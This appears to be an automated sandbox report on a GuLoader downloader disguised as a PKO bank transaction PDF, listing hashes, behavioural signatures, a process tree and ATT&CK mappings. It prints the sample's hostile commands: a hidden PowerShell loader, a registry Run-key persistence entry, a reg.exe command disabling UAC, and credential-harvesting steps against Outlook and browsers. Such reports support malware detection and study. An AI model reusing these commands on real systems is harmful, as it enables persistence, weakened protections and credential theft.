Overview
overview
10Static
static
3pko_trans_...df.exe
windows7-x64
10pko_trans_...df.exe
windows10-2004-x64
10$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...fo.dll
windows7-x64
3$PLUGINSDI...fo.dll
windows10-2004-x64
3$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 08:39
Static task
static1
Behavioral task
behavioral1
Sample
pko_trans_details_20240710_105339·pdf.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
pko_trans_details_20240710_105339·pdf.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win7-20240705-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240709-en
General
-
Target
pko_trans_details_20240710_105339·pdf.exe
-
Size
477KB
-
MD5
c601d5e720a191b1e304c8bcbf63b675
-
SHA1
80133fe77b17d44886e6201d7723be90489a55d2
-
SHA256
d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
-
SHA512
2a78f640f01f365d23bb45bfc96e6900eb1814804bbf905876ac9d6e9353fd3e648efc08858b9e29e41eb6c2262e528d34b00d847524aeeabf41eb319792566f
-
SSDEEP
6144:39X0GFlllllllqllllllllllllhllllYllltlld0wz/ypzAJP8xvP2nWaLcAqRFk:R0Nwzy4EP2nWaPqzJgBKjYl92gCU3Bbl
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2216-84-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 5 2284 powershell.exe 7 2284 powershell.exe 9 2284 powershell.exe 11 2284 powershell.exe 13 2284 powershell.exe 15 2284 powershell.exe 17 2284 powershell.exe 18 2284 powershell.exe 19 2284 powershell.exe 20 2284 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 4 IoCs
Processes:
pko_trans_details_20240710_105339·pdf.exepid process 2444 pko_trans_details_20240710_105339·pdf.exe 2444 pko_trans_details_20240710_105339·pdf.exe 2444 pko_trans_details_20240710_105339·pdf.exe 2444 pko_trans_details_20240710_105339·pdf.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
powershell.exepid process 2284 powershell.exe 2284 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
powershell.exepid process 2284 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 2284 set thread context of 1776 2284 powershell.exe powershell.exe PID 2284 set thread context of 2336 2284 powershell.exe powershell.exe PID 2284 set thread context of 2216 2284 powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepid process 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 1776 powershell.exe 1776 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
powershell.exepid process 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 2216 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2284 powershell.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
pko_trans_details_20240710_105339·pdf.exepowershell.execmd.execmd.exedescription pid process target process PID 2444 wrote to memory of 2284 2444 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2444 wrote to memory of 2284 2444 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2444 wrote to memory of 2284 2444 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2444 wrote to memory of 2284 2444 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2284 wrote to memory of 1884 2284 powershell.exe cmd.exe PID 2284 wrote to memory of 1884 2284 powershell.exe cmd.exe PID 2284 wrote to memory of 1884 2284 powershell.exe cmd.exe PID 2284 wrote to memory of 1884 2284 powershell.exe cmd.exe PID 1884 wrote to memory of 2876 1884 cmd.exe reg.exe PID 1884 wrote to memory of 2876 1884 cmd.exe reg.exe PID 1884 wrote to memory of 2876 1884 cmd.exe reg.exe PID 1884 wrote to memory of 2876 1884 cmd.exe reg.exe PID 2284 wrote to memory of 1072 2284 powershell.exe cmd.exe PID 2284 wrote to memory of 1072 2284 powershell.exe cmd.exe PID 2284 wrote to memory of 1072 2284 powershell.exe cmd.exe PID 2284 wrote to memory of 1072 2284 powershell.exe cmd.exe PID 1072 wrote to memory of 1496 1072 cmd.exe reg.exe PID 1072 wrote to memory of 1496 1072 cmd.exe reg.exe PID 1072 wrote to memory of 1496 1072 cmd.exe reg.exe PID 1072 wrote to memory of 1496 1072 cmd.exe reg.exe PID 2284 wrote to memory of 1776 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 1776 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 1776 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 1776 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 1776 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2336 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2336 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2336 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2336 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2336 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2216 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2216 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2216 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2216 2284 powershell.exe powershell.exe PID 2284 wrote to memory of 2216 2284 powershell.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"3⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"4⤵
- Adds Run key to start application
- Modifies registry key
PID:2876 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"3⤵
- Accesses Microsoft Outlook accounts
PID:2336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
130B
MD5e607cf77e798eb275450c3cda5efeb1c
SHA10b3602942f3d9ad7e1f1ef979ebe589dbc8a8862
SHA2569751f67592c212d9ec4b500087a13140f1feb12af149c0ccbbed240328d71011
SHA51259e4cb59341bca7c436eac0e6e471e52dea263d829fc9c498cd9eabdc6808b6f15931b8a6068e32cfc170ea39ddf4f3bdb300ef937f5aedbb419ea5ee77dd411
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
67KB
MD5bf1ebfd1285dd7ef43a587e9f51a8e33
SHA11dede4026611e9f40c91d9bbe406a06b2fd8bfa4
SHA256de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff
SHA5123b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389
-
Filesize
310KB
MD5afc1982fff88592a55312010cfc773c6
SHA1c57e918c5149ca9c2a331a78ecef84ffc667feb7
SHA25602a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0
SHA512f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e
-
Filesize
7KB
MD5521df745a41f0b8164ffd01717cacbba
SHA1dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74
SHA256dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b
SHA512c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe
-
Filesize
4KB
MD5acbda33dd5700c122e2fe48e3d4351fd
SHA12c154baf7c64052ee712b7cdf9c36b7697dd3fc8
SHA256943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0
SHA512d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd
-
Filesize
9KB
MD51c8b2b40c642e8b5a5b3ff102796fb37
SHA13245f55afac50f775eb53fd6d14abb7fe523393d
SHA2568780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
SHA5124ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57